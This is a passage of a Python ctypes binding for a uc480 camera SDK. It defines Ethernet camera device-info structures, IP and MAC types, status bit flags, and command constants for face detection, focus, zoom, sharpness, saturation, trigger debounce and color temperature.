                ("TimestampSystem", UC480TIME),
                ("dwIoStatus", wt.DWORD),
                ("wAOIIndex", wt.WORD),
                ("wAOICycle", wt.WORD),
                ("u64FrameNumber", ctypes.c_ulonglong),
                ("dwImageBuffers", wt.DWORD),
                ("dwImageBuffersInUse", wt.DWORD),
                ("dwReserved3", wt.DWORD),
                ("dwImageHeight", wt.DWORD),
                ("dwImageWidth", wt.DWORD)]
# ----------------------------------------------------------------------------
# new functions and datatypes only valid for uc480 ETH
# ----------------------------------------------------------------------------
class UC480_ETH_ADDR_IPV4_by(ctypes.Structure):
    """Octet-wise view of an IPv4 address (four individual bytes).

    :var BYTE by1:
    :var BYTE by2:
    :var BYTE by3:
    :var BYTE by4:
    """
    _fields_ = [("by1", wt.BYTE),
                ("by2", wt.BYTE),
                ("by3", wt.BYTE),
                ("by4", wt.BYTE)]
class UC480_ETH_ADDR_IPV4(ctypes.Union):
    """IPv4 address, readable either octet-wise (*by*) or as one DWORD (*dwAddr*).

    This is a ctypes.Union, not a Structure: in the vendor SDK header the two
    members overlay the same four bytes. Declaring it as a Structure (as this
    file previously did) made the type 8 bytes instead of 4 and shifted every
    field of every containing ETH structure, breaking the DLL ABI.

    :var UC480_ETH_ADDR_IPV4_by by:
    :var DWORD dwAddr:
    """
    _fields_ = [("by", UC480_ETH_ADDR_IPV4_by),
                ("dwAddr", wt.DWORD)]
class UC480_ETH_ADDR_MAC(ctypes.Structure):
    """A 6-octet Ethernet MAC address.

    :var BYTE[6] abyOctet:
    """
    _fields_ = [("abyOctet", wt.BYTE * 6)]
class UC480_ETH_IP_CONFIGURATION(ctypes.Structure):
    """IPv4 address plus subnet mask of a device/adapter.

    NOTE(review): *reserved* is a single BYTE here; the vendor SDK header may
    declare it as BYTE[4] -- verify sizeof against the DLL before passing this
    structure by value.

    :var UC480_ETH_ADDR_IPV4 ipAddress:
    :var UC480_ETH_ADDR_IPV4 ipSubnetmask:
    :var BYTE reserved:
    """
    _fields_ = [("ipAddress", UC480_ETH_ADDR_IPV4),
                ("ipSubnetmask", UC480_ETH_ADDR_IPV4),
                ("reserved", wt.BYTE)]
# bit flags for the dwStatus member of UC480_ETH_DEVICE_INFO_HEARTBEAT
IS_ETH_DEVSTATUS_READY_TO_OPERATE= 0x00000001 # !< device is ready to operate
IS_ETH_DEVSTATUS_TESTING_IP_CURRENT= 0x00000002 # !< device is (arp-)probing its current ip
IS_ETH_DEVSTATUS_TESTING_IP_PERSISTENT= 0x00000004 # !< device is (arp-)probing its persistent ip
IS_ETH_DEVSTATUS_TESTING_IP_RANGE= 0x00000008 # !< device is (arp-)probing the autocfg ip range
IS_ETH_DEVSTATUS_INAPPLICABLE_IP_CURRENT= 0x00000010 # !< current ip is inapplicable
IS_ETH_DEVSTATUS_INAPPLICABLE_IP_PERSISTENT= 0x00000020 # !< persistent ip is inapplicable
IS_ETH_DEVSTATUS_INAPPLICABLE_IP_RANGE= 0x00000040 # !< autocfg ip range is inapplicable
IS_ETH_DEVSTATUS_UNPAIRED= 0x00000100 # !< device is unpaired
IS_ETH_DEVSTATUS_PAIRING_IN_PROGRESS= 0x00000200 # !< device is being paired
IS_ETH_DEVSTATUS_PAIRED= 0x00000400 # !< device is paired
IS_ETH_DEVSTATUS_FORCE_100MBPS= 0x00001000 # !< device phy is configured to 100 Mbps
IS_ETH_DEVSTATUS_NO_COMPORT= 0x00002000 # !< device does not support uc480 eth comport
IS_ETH_DEVSTATUS_RECEIVING_FW_STARTER= 0x00010000 # !< device is receiving the starter firmware
IS_ETH_DEVSTATUS_RECEIVING_FW_RUNTIME= 0x00020000 # !< device is receiving the runtime firmware
IS_ETH_DEVSTATUS_INAPPLICABLE_FW_RUNTIME= 0x00040000 # !< runtime firmware is inapplicable
IS_ETH_DEVSTATUS_INAPPLICABLE_FW_STARTER= 0x00080000 # !< starter firmware is inapplicable
IS_ETH_DEVSTATUS_REBOOTING_FW_RUNTIME= 0x00100000 # !< device is rebooting to runtime firmware
IS_ETH_DEVSTATUS_REBOOTING_FW_STARTER= 0x00200000 # !< device is rebooting to starter firmware
IS_ETH_DEVSTATUS_REBOOTING_FW_FAILSAFE= 0x00400000 # !< device is rebooting to failsafe firmware
IS_ETH_DEVSTATUS_RUNTIME_FW_ERR0= 0x80000000 # !< checksum error runtime firmware
# heartbeat info transmitted periodically by a device
# contained in UC480_ETH_DEVICE_INFO
class UC480_ETH_DEVICE_INFO_HEARTBEAT(ctypes.Structure):
    """Heartbeat data broadcast periodically by an ETH camera
    (embedded in UC480_ETH_DEVICE_INFO).

    :var BYTE[12] abySerialNumber:
    :var BYTE byDeviceType:
    :var BYTE byCameraID:
    :var WORD wSensorID:
    :var WORD wSizeImgMem_MB:
    :var BYTE[2] reserved_1:
    :var DWORD dwVerStarterFirmware:
    :var DWORD dwVerRuntimeFirmware:
    :var DWORD dwStatus:
    :var BYTE[4] reserved_2:
    :var WORD wTemperature:
    :var WORD wLinkSpeed_Mb:
    :var UC480_ETH_ADDR_MAC macDevice:
    :var WORD wComportOffset:
    :var UC480_ETH_IP_CONFIGURATION ipcfgPersistentIpCfg:
    :var UC480_ETH_IP_CONFIGURATION ipcfgCurrentIpCfg:
    :var UC480_ETH_ADDR_MAC macPairedHost:
    :var BYTE[2] reserved_4:
    :var UC480_ETH_ADDR_IPV4 ipPairedHostIp:
    :var UC480_ETH_ADDR_IPV4 ipAutoCfgIpRangeBegin:
    :var UC480_ETH_ADDR_IPV4 ipAutoCfgIpRangeEnd:
    :var BYTE[8] abyUserSpace:
    :var BYTE[84] reserved_5:
    :var BYTE[64] reserved_6:
    """
    _fields_ = [("abySerialNumber", wt.BYTE * 12),
                ("byDeviceType", wt.BYTE),
                ("byCameraID", wt.BYTE),
                ("wSensorID", wt.WORD),
                ("wSizeImgMem_MB", wt.WORD),
                ("reserved_1", wt.BYTE * 2),
                ("dwVerStarterFirmware", wt.DWORD),
                ("dwVerRuntimeFirmware", wt.DWORD),
                ("dwStatus", wt.DWORD),
                ("reserved_2", wt.BYTE * 4),
                ("wTemperature", wt.WORD),
                ("wLinkSpeed_Mb", wt.WORD),
                ("macDevice", UC480_ETH_ADDR_MAC),
                ("wComportOffset", wt.WORD),
                ("ipcfgPersistentIpCfg", UC480_ETH_IP_CONFIGURATION),
                ("ipcfgCurrentIpCfg", UC480_ETH_IP_CONFIGURATION),
                ("macPairedHost", UC480_ETH_ADDR_MAC),
                ("reserved_4", wt.BYTE * 2),
                ("ipPairedHostIp", UC480_ETH_ADDR_IPV4),
                ("ipAutoCfgIpRangeBegin", UC480_ETH_ADDR_IPV4),
                ("ipAutoCfgIpRangeEnd", UC480_ETH_ADDR_IPV4),
                ("abyUserSpace", wt.BYTE * 8),
                ("reserved_5", wt.BYTE * 84),
                ("reserved_6", wt.BYTE * 64)]
# bit flags for the dwControlStatus member of UC480_ETH_DEVICE_INFO_CONTROL
IS_ETH_CTRLSTATUS_AVAILABLE= 0x00000001 # !< device is available TO US
IS_ETH_CTRLSTATUS_ACCESSIBLE1= 0x00000002 # !< device is accessible BY US, i.e. directly 'unicastable'
IS_ETH_CTRLSTATUS_ACCESSIBLE2= 0x00000004 # !< device is accessible BY US, i.e. not on persistent ip and adapters ip autocfg range is valid
IS_ETH_CTRLSTATUS_PERSISTENT_IP_USED= 0x00000010 # !< device is running on persistent ip configuration
IS_ETH_CTRLSTATUS_COMPATIBLE= 0x00000020 # !< device is compatible TO US
IS_ETH_CTRLSTATUS_ADAPTER_ON_DHCP= 0x00000040 # !< adapter is configured to use dhcp
IS_ETH_CTRLSTATUS_ADAPTER_SETUP_OK = 0x00000080 # !< adapter's setup is ok with respect to uc480 needs
IS_ETH_CTRLSTATUS_UNPAIRING_IN_PROGRESS= 0x00000100 # !< device is being unpaired FROM US
IS_ETH_CTRLSTATUS_PAIRING_IN_PROGRESS= 0x00000200 # !< device is being paired TO US
IS_ETH_CTRLSTATUS_PAIRED= 0x00001000 # !< device is paired TO US
IS_ETH_CTRLSTATUS_OPENED = 0x00004000 # !< device is opened BY SELF
IS_ETH_CTRLSTATUS_FW_UPLOAD_STARTER= 0x00010000 # !< device is receiving the starter firmware
IS_ETH_CTRLSTATUS_FW_UPLOAD_RUNTIME= 0x00020000 # !< device is receiving the runtime firmware
IS_ETH_CTRLSTATUS_REBOOTING= 0x00100000 # !< device is rebooting
IS_ETH_CTRLSTATUS_BOOTBOOST_ENABLED = 0x01000000 # !< boot-boosting is enabled for this device
IS_ETH_CTRLSTATUS_BOOTBOOST_ACTIVE = 0x02000000 # !< boot-boosting is active for this device
IS_ETH_CTRLSTATUS_INITIALIZED= 0x08000000 # !< device object is initialized
IS_ETH_CTRLSTATUS_TO_BE_DELETED= 0x40000000 # !< device object is being deleted
IS_ETH_CTRLSTATUS_TO_BE_REMOVED= 0x80000000 # !< device object is being removed
class UC480_ETH_DEVICE_INFO_CONTROL(ctypes.Structure):
    """Driver-side control info for an ETH device
    (embedded in UC480_ETH_DEVICE_INFO).

    :var DWORD dwDeviceID:
    :var DWORD dwControlStatus:
    :var BYTE[80] reserved_1:
    :var BYTE[64] reserved_2:
    """
    _fields_ = [("dwDeviceID", wt.DWORD),
                ("dwControlStatus", wt.DWORD),
                ("reserved_1", wt.BYTE * 80),
                ("reserved_2", wt.BYTE * 64)]
class UC480_ETH_ETHERNET_CONFIGURATION(ctypes.Structure):
    """IP configuration plus MAC address of one Ethernet endpoint.

    :var UC480_ETH_IP_CONFIGURATION ipcfg:
    :var UC480_ETH_ADDR_MAC mac:
    """
    _fields_ = [("ipcfg", UC480_ETH_IP_CONFIGURATION),
                ("mac", UC480_ETH_ADDR_MAC)]
class UC480_ETH_AUTOCFG_IP_SETUP(ctypes.Structure):
    """Begin/end of the automatic IP configuration range.

    :var UC480_ETH_ADDR_IPV4 ipAutoCfgIpRangeBegin:
    :var UC480_ETH_ADDR_IPV4 ipAutoCfgIpRangeEnd:
    :var BYTE[4] reserved:
    """
    _fields_ = [("ipAutoCfgIpRangeBegin", UC480_ETH_ADDR_IPV4),
                ("ipAutoCfgIpRangeEnd", UC480_ETH_ADDR_IPV4),
                ("reserved", wt.BYTE * 4)]
# values for incoming packets filter setup
IS_ETH_PCKTFLT_PASSALL= 0 # !< pass all packets to OS
IS_ETH_PCKTFLT_BLOCKUEGET= 1 # !< block UEGET packets to the OS
IS_ETH_PCKTFLT_BLOCKALL= 2 # !< block all packets to the OS
# values for link speed setup
IS_ETH_LINKSPEED_100MB= 100 # !< 100 MBits
IS_ETH_LINKSPEED_1000MB= 1000 # !< 1000 MBits
# control info for a device's network adapter
# contained in UC480_ETH_DEVICE_INFO
class UC480_ETH_ADAPTER_INFO(ctypes.Structure):
    """Host network adapter info for one ETH device
    (embedded in UC480_ETH_DEVICE_INFO).

    :var DWORD dwAdapterID:
    :var DWORD dwDeviceLinkspeed:
    :var UC480_ETH_ETHERNET_CONFIGURATION ethcfg:
    :var BYTE[2] reserved_2:
    :var BOOL bIsEnabledDHCP:
    :var UC480_ETH_AUTOCFG_IP_SETUP autoCfgIp:
    :var BOOL bIsValidAutoCfgIpRange:
    :var DWORD dwCntDevicesKnown:
    :var DWORD dwCntDevicesPaired:
    :var WORD wPacketFilter:
    :var BYTE[38] reserved_3:
    :var BYTE[64] reserved_4:
    """
    _fields_ = [("dwAdapterID", wt.DWORD),
                ("dwDeviceLinkspeed", wt.DWORD),
                ("ethcfg", UC480_ETH_ETHERNET_CONFIGURATION),
                ("reserved_2", wt.BYTE * 2),
                ("bIsEnabledDHCP", wt.BOOL),
                ("autoCfgIp", UC480_ETH_AUTOCFG_IP_SETUP),
                ("bIsValidAutoCfgIpRange", wt.BOOL),
                ("dwCntDevicesKnown", wt.DWORD),
                ("dwCntDevicesPaired", wt.DWORD),
                ("wPacketFilter", wt.WORD),
                ("reserved_3", wt.BYTE * 38),
                ("reserved_4", wt.BYTE * 64)]
# driver info
# contained in UC480_ETH_DEVICE_INFO
class UC480_ETH_DRIVER_INFO(ctypes.Structure):
    """Driver firmware-compatibility info
    (embedded in UC480_ETH_DEVICE_INFO).

    :var DWORD dwMinVerStarterFirmware:
    :var DWORD dwMaxVerStarterFirmware:
    :var BYTE[8] reserved_1:
    :var BYTE[64] reserved_2:
    """
    _fields_ = [("dwMinVerStarterFirmware", wt.DWORD),
                ("dwMaxVerStarterFirmware", wt.DWORD),
                ("reserved_1", wt.BYTE * 8),
                ("reserved_2", wt.BYTE * 64)]
# use is_GetEthDeviceInfo() to obtain this data.
class UC480_ETH_DEVICE_INFO(ctypes.Structure):
    """Aggregate device info returned by is_GetEthDeviceInfo().

    :var UC480_ETH_DEVICE_INFO_HEARTBEAT infoDevHeartbeat:
    :var UC480_ETH_DEVICE_INFO_CONTROL infoDevControl:
    :var UC480_ETH_ADAPTER_INFO infoAdapter:
    :var UC480_ETH_DRIVER_INFO infoDriver:
    """
    _fields_ = [("infoDevHeartbeat", UC480_ETH_DEVICE_INFO_HEARTBEAT),
                ("infoDevControl", UC480_ETH_DEVICE_INFO_CONTROL),
                ("infoAdapter", UC480_ETH_ADAPTER_INFO),
                ("infoDriver", UC480_ETH_DRIVER_INFO)]
class UC480_COMPORT_CONFIGURATION(ctypes.Structure):
    """Virtual COM-port number assigned to the device.

    :var WORD wComportNumber:
    """
    _fields_ = [("wComportNumber", wt.WORD)]
class IS_DEVICE_INFO_HEARTBEAT(ctypes.Structure):
    """Periodic device heartbeat (embedded in IS_DEVICE_INFO).

    :var BYTE[24] reserved_1:
    :var DWORD dwRuntimeFirmwareVersion:
    :var BYTE[8] reserved_2:
    :var WORD wTemperature:
    :var WORD wLinkSpeed_Mb:
    :var BYTE[6] reserved_3:
    :var WORD wComportOffset:
    :var BYTE[200] reserved:
    """
    _fields_ = [("reserved_1", wt.BYTE * 24),
                ("dwRuntimeFirmwareVersion", wt.DWORD),
                ("reserved_2", wt.BYTE * 8),
                ("wTemperature", wt.WORD),
                ("wLinkSpeed_Mb", wt.WORD),
                ("reserved_3", wt.BYTE * 6),
                ("wComportOffset", wt.WORD),
                ("reserved", wt.BYTE * 200)]
class IS_DEVICE_INFO_CONTROL(ctypes.Structure):
    """Control block of IS_DEVICE_INFO.

    :var DWORD dwDeviceId:
    :var BYTE[148] reserved:

    (The docstring previously said BYTE[146]; the declared field below is
    BYTE * 148, which the docstring now matches.)
    """
    _fields_ = [("dwDeviceId", wt.DWORD),
                ("reserved", wt.BYTE * 148)]
class IS_DEVICE_INFO(ctypes.Structure):
    """Aggregate queried via the IS_DEVICE_INFO_CMD_GET_DEVICE_INFO command.

    :var IS_DEVICE_INFO_HEARTBEAT infoDevHeartbeat:
    :var IS_DEVICE_INFO_CONTROL infoDevControl:
    :var BYTE[240] reserved:
    """
    _fields_ = [("infoDevHeartbeat", IS_DEVICE_INFO_HEARTBEAT),
                ("infoDevControl", IS_DEVICE_INFO_CONTROL),
                ("reserved", wt.BYTE * 240)]
IS_DEVICE_INFO_CMD_GET_DEVICE_INFO = 0x02010001
class OPENGL_DISPLAY(ctypes.Structure):
    """OpenGL display target (window id plus an opaque display pointer).

    :var ctypes.c_int nWindowID:
    :var ctypes.c_void_p pDisplay:
    """
    _fields_ = [("nWindowID", ctypes.c_int),
                ("pDisplay", ctypes.c_void_p)]
IMGFRMT_CMD_GET_NUM_ENTRIES = 1 # Get the number of supported image formats.
# pParam hast to be a Pointer to IS_U32. If -1 is reported, the device
# supports continuous AOI settings (maybe with fixed increments)
IMGFRMT_CMD_GET_LIST = 2 # Get a array of IMAGE_FORMAT_ELEMENTs.
IMGFRMT_CMD_SET_FORMAT = 3 # Select a image format
IMGFRMT_CMD_GET_ARBITRARY_AOI_SUPPORTED = 4 # Does the device supports the setting of an arbitrary AOI.
IMGFRMT_CMD_GET_FORMAT_INFO = 5 # Get IMAGE_FORMAT_INFO for a given formatID
# capture-mode bit flags
# no trigger
CAPTMODE_FREERUN = 0x00000001
CAPTMODE_SINGLE = 0x00000002
# software trigger modes
CAPTMODE_TRIGGER_SOFT_SINGLE = 0x00000010
CAPTMODE_TRIGGER_SOFT_CONTINUOUS = 0x00000020
# hardware trigger modes
CAPTMODE_TRIGGER_HW_SINGLE = 0x00000100
CAPTMODE_TRIGGER_HW_CONTINUOUS = 0x00000200
class IMAGE_FORMAT_INFO(ctypes.Structure):
    """Description of one supported image format.

    :var INT nFormatID:
    :var UINT nWidth:
    :var UINT nHeight:
    :var INT nX0:
    :var INT nY0:
    :var UINT nSupportedCaptureModes:
    :var UINT nBinningMode:
    :var UINT nSubsamplingMode:
    :var ctypes.c_char[64] strFormatName:
    :var ctypes.c_double dSensorScalerFactor:
    :var UINT[22] nReserved:
    """
    _fields_ = [("nFormatID", wt.INT),
                ("nWidth", wt.UINT),
                ("nHeight", wt.UINT),
                ("nX0", wt.INT),
                ("nY0", wt.INT),
                ("nSupportedCaptureModes", wt.UINT),
                ("nBinningMode", wt.UINT),
                ("nSubsamplingMode", wt.UINT),
                ("strFormatName", ctypes.c_char * 64),
                ("dSensorScalerFactor", ctypes.c_double),
                ("nReserved", wt.UINT * 22)]
# class IMAGE_FORMAT_LIST(ctypes.Structure):
#     _fields_ = [("nSizeOfListEntry", wt.UINT),
#                 ("nNumListElements", wt.UINT),
#                 ("nReserved", wt.UINT * 4),
#                 ("FormatInfo", ctypes.POINTER(IMAGE_FORMAT_INFO))]
def create_image_format_list(nNumListElements):
    """Return an IMAGE_FORMAT_LIST whose *FormatInfo* array is dimensioned for exactly *nNumListElements* entries.

    :param ULONG nNumListElements: Number of format info structures requested.
    :returns: IMAGE_FORMAT_LIST
    :var UINT nSizeOfListEntry:
    :var UINT nNumListElements:
    :var UINT[4] nReserved:
    :var IMAGE_FORMAT_INFO[nNumListElements] FormatInfo:
    """
    # the array length must be baked into the type, so the class is built per call
    class IMAGE_FORMAT_LIST(ctypes.Structure):
        _fields_ = [("nSizeOfListEntry", wt.UINT),
                    ("nNumListElements", wt.UINT),
                    ("nReserved", wt.UINT * 4),
                    ("FormatInfo", IMAGE_FORMAT_INFO * nNumListElements)]
    # keyword construction zero-fills the array and stores the count in one step
    return IMAGE_FORMAT_LIST(nNumListElements=nNumListElements)
# face detection capability bit flags
FDT_CAP_INVALID = 0
FDT_CAP_SUPPORTED = 0x00000001 # Face detection supported.
FDT_CAP_SEARCH_ANGLE = 0x00000002 # Search angle.
FDT_CAP_SEARCH_AOI = 0x00000004 # Search AOI.
FDT_CAP_INFO_POSX = 0x00000010 # Query horizontal position (center) of detected face.
FDT_CAP_INFO_POSY = 0x00000020 # Query vertical position(center) of detected face.
FDT_CAP_INFO_WIDTH = 0x00000040 # Query width of detected face.
FDT_CAP_INFO_HEIGHT = 0x00000080 # Query height of detected face.
FDT_CAP_INFO_ANGLE = 0x00000100 # Query angle of detected face.
FDT_CAP_INFO_POSTURE = 0x00000200 # Query posture of detected face.
FDT_CAP_INFO_FACENUMBER = 0x00000400 # Query number of detected faces.
FDT_CAP_INFO_OVL = 0x00000800 # Overlay: Mark the detected face in the image.
FDT_CAP_INFO_NUM_OVL = 0x00001000 # Overlay: Limit the maximum number of overlays in one image.
FDT_CAP_INFO_OVL_LINEWIDTH = 0x00002000 # Overlay line width.
class FDT_INFO_EL(ctypes.Structure):
    """One detected-face entry (position, size, angle, posture, timestamp).

    :var INT nFacePosX:
    :var INT nFacePosY:
    :var INT nFaceWidth:
    :var INT nFaceHeight:
    :var INT nAngle:
    :var UINT nPosture:
    :var UC480TIME TimestampSystem:
    :var ctypes.c_ulonglong nReserved:
    :var UINT[4] nReserved2:
    """
    _fields_ = [("nFacePosX", wt.INT),
                ("nFacePosY", wt.INT),
                ("nFaceWidth", wt.INT),
                ("nFaceHeight", wt.INT),
                ("nAngle", wt.INT),
                ("nPosture", wt.UINT),
                ("TimestampSystem", UC480TIME),
                ("nReserved", ctypes.c_ulonglong),
                ("nReserved2", wt.UINT * 4)]
# class FDT_INFO_LIST(ctypes.Structure):
#     _fields_ = [("nSizeOfListEntry", wt.UINT),
#                 ("nNumDetectedFaces", wt.UINT),
#                 ("nNumListElements", wt.UINT),
#                 ("nReserved", wt.UINT * 4),
#                 ("FaceEntry", ctypes.POINTER(FDT_INFO_EL))]
def create_fdt_info_list(nNumListElements):
    """Return an FDT_INFO_LIST whose *FaceEntry* array is dimensioned for exactly *nNumListElements* entries.

    :param ULONG nNumListElements: Number of face entry structures requested.
    :returns: FDT_INFO_LIST
    :var UINT nSizeOfListEntry:
    :var UINT nNumDetectedFaces:
    :var UINT nNumListElements:
    :var UINT[4] nReserved:
    :var FDT_INFO_EL[nNumListElements] FaceEntry:
    """
    # the array length must be baked into the type, so the class is built per call
    class FDT_INFO_LIST(ctypes.Structure):
        _fields_ = [("nSizeOfListEntry", wt.UINT),
                    ("nNumDetectedFaces", wt.UINT),
                    ("nNumListElements", wt.UINT),
                    ("nReserved", wt.UINT * 4),
                    ("FaceEntry", FDT_INFO_EL * nNumListElements)]
    # keyword construction zero-fills the array and stores the count in one step
    return FDT_INFO_LIST(nNumListElements=nNumListElements)
FDT_CMD_GET_CAPABILITIES = 0 # Get the capabilities for face detection.
FDT_CMD_SET_DISABLE = 1 # Disable face detection.
FDT_CMD_SET_ENABLE = 2 # Enable face detection.
FDT_CMD_SET_SEARCH_ANGLE = 3 # Set the search angle.
FDT_CMD_GET_SEARCH_ANGLE = 4 # Get the search angle parameter.
FDT_CMD_SET_SEARCH_ANGLE_ENABLE = 5 # Enable search angle.
FDT_CMD_SET_SEARCH_ANGLE_DISABLE= 6 # Disable search angle.
FDT_CMD_GET_SEARCH_ANGLE_ENABLE = 7 # Get the current setting of search angle enable.
FDT_CMD_SET_SEARCH_AOI = 8 # Set the search AOI.
FDT_CMD_GET_SEARCH_AOI = 9 # Get the search AOI.
FDT_CMD_GET_FACE_LIST = 10 # Get a list with detected faces.
FDT_CMD_GET_NUMBER_FACES = 11 # Get the number of detected faces.
FDT_CMD_SET_SUSPEND = 12 # Keep the face detection result of that moment.
FDT_CMD_SET_RESUME = 13 # Continue with the face detection.
FDT_CMD_GET_MAX_NUM_FACES = 14 # Get the maximum number of faces that can be detected once.
FDT_CMD_SET_INFO_MAX_NUM_OVL = 15 # Set the maximum number of overlays displayed.
FDT_CMD_GET_INFO_MAX_NUM_OVL = 16 # Get the setting 'maximum number of overlays displayed'.
FDT_CMD_SET_INFO_OVL_LINE_WIDTH = 17 # Set the overlay line width.
FDT_CMD_GET_INFO_OVL_LINE_WIDTH = 18 # Get the overlay line width.
FDT_CMD_GET_ENABLE = 19 # Face detection enabled?.
FDT_CMD_GET_SUSPEND = 20 # Face detection suspended?.
FOC_CAP_INVALID = 0
FOC_CAP_AUTOFOCUS_SUPPORTED = 0x00000001 # Auto focus supported.
FOC_CAP_MANUAL_SUPPORTED = 0x00000002 # Manual focus supported.
FOC_CAP_GET_DISTANCE = 0x00000004 # Support for query the distance of the focused object.
FOC_CAP_SET_AUTOFOCUS_RANGE = 0x00000008 # Support for setting focus ranges.
FOC_RANGE_NORMAL = 0x00000001 # Normal focus range(without Macro).
FOC_RANGE_ALLRANGE = 0x00000002 # Allrange (macro to Infinity).
FOC_RANGE_MACRO = 0x00000004 # Macro (only macro).
FOC_CMD_GET_CAPABILITIES = 0 # Get focus capabilities.
FOC_CMD_SET_DISABLE_AUTOFOCUS = 1 # Disable autofocus.
FOC_CMD_SET_ENABLE_AUTOFOCUS = 2 # Enable autofocus.
FOC_CMD_GET_AUTOFOCUS_ENABLE = 3 # Autofocus enabled?.
FOC_CMD_SET_AUTOFOCUS_RANGE = 4 # Preset autofocus range.
FOC_CMD_GET_AUTOFOCUS_RANGE = 5 # Get preset of autofocus range.
FOC_CMD_GET_DISTANCE = 6 # Get distance to focused object.
FOC_CMD_SET_MANUAL_FOCUS = 7 # Set manual focus.
FOC_CMD_GET_MANUAL_FOCUS = 8 # Get the value for manual focus.
FOC_CMD_GET_MANUAL_FOCUS_MIN = 9 # Get the minimum manual focus value.
FOC_CMD_GET_MANUAL_FOCUS_MAX = 10 # Get the maximum manual focus value.
FOC_CMD_GET_MANUAL_FOCUS_INC = 11 # Get the increment of the manual focus value.
IMGSTAB_CAP_INVALID = 0
IMGSTAB_CAP_IMAGE_STABILIZATION_SUPPORTED = 0x00000001 # Image stabilization supported.
IMGSTAB_CMD_GET_CAPABILITIES = 0 # Get the capabilities for image stabilization.
IMGSTAB_CMD_SET_DISABLE = 1 # Disable image stabilization.
IMGSTAB_CMD_SET_ENABLE = 2 # Enable image stabilization.
IMGSTAB_CMD_GET_ENABLE = 3 # Image stabilization enabled?
SCENE_CMD_GET_SUPPORTED_PRESETS = 1# Get the supported scene presets
SCENE_CMD_SET_PRESET = 2# Set the scene preset
SCENE_CMD_GET_PRESET = 3# Get the current sensor scene preset
SCENE_CMD_GET_DEFAULT_PRESET = 4 # Get the default sensor scene preset
SCENE_INVALID = 0
SCENE_SENSOR_AUTOMATIC = 0x00000001
SCENE_SENSOR_PORTRAIT = 0x00000002
SCENE_SENSOR_SUNNY = 0x00000004
SCENE_SENSOR_ENTERTAINMENT = 0x00000008
SCENE_SENSOR_NIGHT = 0x00000010
SCENE_SENSOR_SPORTS = 0x00000040
SCENE_SENSOR_LANDSCAPE = 0x00000080
ZOOM_CMD_GET_CAPABILITIES = 0# Get the zoom capabilities.
ZOOM_CMD_DIGITAL_GET_NUM_LIST_ENTRIES = 1# Get the number of list entries.
ZOOM_CMD_DIGITAL_GET_LIST = 2# Get a list of supported zoom factors.
ZOOM_CMD_DIGITAL_SET_VALUE = 3# Set the digital zoom factor zoom factors.
ZOOM_CMD_DIGITAL_GET_VALUE = 4 # Get a current digital zoom factor.
ZOOM_CAP_INVALID = 0
ZOOM_CAP_DIGITAL_ZOOM = 0x00001
SHARPNESS_CMD_GET_CAPABILITIES = 0 # Get the sharpness capabilities
SHARPNESS_CMD_GET_VALUE = 1 # Get the current sharpness value
SHARPNESS_CMD_GET_MIN_VALUE = 2 # Get the minimum sharpness value
SHARPNESS_CMD_GET_MAX_VALUE = 3 # Get the maximum sharpness value
SHARPNESS_CMD_GET_INCREMENT = 4 # Get the sharpness increment
SHARPNESS_CMD_GET_DEFAULT_VALUE = 5 # Get the default sharpness value
SHARPNESS_CMD_SET_VALUE = 6 # Set the sharpness value
SHARPNESS_CAP_INVALID = 0x0000
SHARPNESS_CAP_SHARPNESS_SUPPORTED = 0x0001
SATURATION_CMD_GET_CAPABILITIES = 0 # Get the saturation capabilities
SATURATION_CMD_GET_VALUE = 1 # Get the current saturation value
SATURATION_CMD_GET_MIN_VALUE = 2 # Get the minimum saturation value
SATURATION_CMD_GET_MAX_VALUE = 3 # Get the maximum saturation value
SATURATION_CMD_GET_INCREMENT = 4 # Get the saturation increment
SATURATION_CMD_GET_DEFAULT = 5 # Get the default saturation value
SATURATION_CMD_SET_VALUE = 6 # Set the saturation value
SATURATION_CAP_INVALID = 0x0000
SATURATION_CAP_SATURATION_SUPPORTED = 0x0001
TRIGGER_DEBOUNCE_MODE_NONE = 0x0000
TRIGGER_DEBOUNCE_MODE_FALLING_EDGE = 0x0001
TRIGGER_DEBOUNCE_MODE_RISING_EDGE = 0x0002
TRIGGER_DEBOUNCE_MODE_BOTH_EDGES = 0x0004
TRIGGER_DEBOUNCE_MODE_AUTOMATIC = 0x0008
TRIGGER_DEBOUNCE_CMD_SET_MODE = 0 # Set a new trigger debounce mode
TRIGGER_DEBOUNCE_CMD_SET_DELAY_TIME = 1 # Set a new trigger debounce delay time
TRIGGER_DEBOUNCE_CMD_GET_SUPPORTED_MODES = 2 # Get the supported modes
TRIGGER_DEBOUNCE_CMD_GET_MODE = 3 # Get the current trigger debounce mode
TRIGGER_DEBOUNCE_CMD_GET_DELAY_TIME = 4 # Get the current trigger debounce delay time
TRIGGER_DEBOUNCE_CMD_GET_DELAY_TIME_MIN = 5 # Get the minimum value for the trigger debounce delay time
TRIGGER_DEBOUNCE_CMD_GET_DELAY_TIME_MAX = 6 # Get the maximum value for the trigger debounce delay time
TRIGGER_DEBOUNCE_CMD_GET_DELAY_TIME_INC = 7 # Get the increment of the trigger debounce delay time
TRIGGER_DEBOUNCE_CMD_GET_MODE_DEFAULT = 8 # Get the default trigger debounce mode
TRIGGER_DEBOUNCE_CMD_GET_DELAY_TIME_DEFAULT = 9 # Get the default trigger debounce delay time
RGB_COLOR_MODEL_SRGB_D50 = 0x0001
RGB_COLOR_MODEL_SRGB_D65 = 0x0002
RGB_COLOR_MODEL_CIE_RGB_E = 0x0004
RGB_COLOR_MODEL_ECI_RGB_D50 = 0x0008
RGB_COLOR_MODEL_ADOBE_RGB_D65 = 0x0010
COLOR_TEMPERATURE_CMD_SET_TEMPERATURE = 0 # Set a new color temperature
COLOR_TEMPERATURE_CMD_SET_RGB_COLOR_MODEL = 1 # Set a new RGB color model
COLOR_TEMPERATURE_CMD_GET_SUPPORTED_RGB_COLOR_MODELS = 2 # Get the supported RGB color models
COLOR_TEMPERATURE_CMD_GET_TEMPERATURE = 3 # Get the current color temperature
COLOR_TEMPERATURE_CMD_GET_RGB_COLOR_MODEL = 4 # Get the current RGB color model
COLOR_TEMPERATURE_CMD_GET_TEMPERATURE_MIN = 5 # Get the minimum value for the color temperature
COLOR_TEMPERATURE_CMD_GET_TEMPERATURE_MAX = 6 # Get the maximum value for the color temperature
COLOR_TEMPERATURE_CMD_GET_TEMPERATURE_INC = 7 # Get the increment of the color temperature
COLOR_TEMPERATURE_CMD_GET_TEMPERATURE_DEFAULT = 8 # Get the default color temperature
COLOR_TEMPERATURE_CMD_GET_RGB_COLOR_MODEL_DEFAULT = 9 # Get the default RGB color model
class IS_POINT_2D(ctypes.Structure):
    """2D point with signed 32-bit integer coordinates.

    :var INT s32X:
    :var INT s32Y:
    """
